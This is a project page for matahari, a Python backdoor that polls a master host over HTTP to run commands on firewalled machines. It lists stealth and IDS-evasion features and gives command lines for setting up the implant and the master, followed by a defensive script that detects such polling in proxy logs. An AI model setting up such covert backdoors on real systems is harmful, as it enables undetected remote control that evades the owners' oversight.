Latest stable version: 0.1.30 - Please upgrade!
Introduction and motivation
matahari is a Python script designed to provide a basic non-interactive shell on remote systems behind firewalls. It is intended for system administrators who may need an emergency backdoor to access a firewalled machine.
Once the script is set up on the target machine (the client), it begins trying to retrieve commands from the master machine (the server). The time between periodic requests (polls) can be configured to suit different needs, ranging from low latency (frequent polls) to stealthier behaviour.
All traffic between the target and master machines is carried over HTTP GET/POST requests and their corresponding responses, traversing the firewall as standard outgoing web traffic. Optional IDS-evasion techniques can be used in special scenarios where the backdoor should remain totally undetected by firewall administrators.
Although matahari is at an early stage of development (so you should be forgiving with her ;), the current version offers these features:
- Full support for non-interactive commands
- Several polling types to suit different needs
- Rough calculation of estimated time for next command execution
- Payload encryption support using the ARC4 algorithm (requires the python-crypto package), with salted passwords to avoid retransmission attacks
- Basic HTTP proxy support
- Random polling times for IDS evasion
- Support for admin commands to remotely modify the initially configured polling type
Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows:
- Run on the target machine:
./matahari.py -c master.bar.com -T polite
Be sure to keep the process running even after logging off (nohup and screen are your friends).
- Run at any time on the master machine:
./matahari.py -s target.foo.com
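
Seen from the firewall or proxy, the polling described above is one internal host making repeated HTTP GET/POST requests to the same external host at regular or bounded-random intervals. The following is an added example, not part of matahari: it flags such host pairs in proxy logs by the regularity of the gaps between requests. The log format, client addresses and thresholds are assumptions, and the sample log is constructed.

```python
from collections import defaultdict
from statistics import mean, pstdev

def build_sample_log():
    """Constructed proxy log, one request per line: 'epoch client method host'."""
    flows = {  # (client, host) -> gaps in seconds between requests
        ("10.0.0.5", "master.bar.com"): [60] * 9,                      # fixed polling
        ("10.0.0.7", "master.bar.com"): [40, 75, 55, 90, 45, 80, 60],  # random polling
        ("10.0.0.9", "www.example.org"): [1, 1, 1, 397, 1, 1, 598],    # bursty browsing
    }
    lines = []
    for (client, host), gaps in flows.items():
        t = 1000
        for gap in [0] + gaps:
            t += gap
            lines.append(f"{t} {client} GET {host}")
    return "\n".join(lines)

def parse(log):
    """Group GET/POST request times by (client, destination host)."""
    flows = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[0].isdigit():
            continue  # skip malformed lines
        ts, client, method, host = parts
        if method in ("GET", "POST"):
            flows[(client, host)].append(int(ts))
    return flows

def find_pollers(log, min_requests=6, min_span=300, max_cv=0.5):
    """Flag flows whose request gaps are regular (low coefficient of variation).

    Thresholds are assumed starting points; tune them on your own traffic.
    """
    hits = {}
    for key, times in parse(log).items():
        times.sort()
        if len(times) < min_requests or times[-1] - times[0] < min_span:
            continue
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:  # fixed polling gives cv near 0; human browsing is bursty
            hits[key] = {"requests": len(times), "mean_gap": round(avg, 1), "cv": round(cv, 2)}
    return hits

if __name__ == "__main__":
    for (client, host), stats in find_pollers(build_sample_log()).items():
        print(client, "->", host, stats)
```

On the constructed log, both polling clients are reported and the browsing client is not. Because the payload is encrypted, timing and destination are the features that remain visible to the proxy.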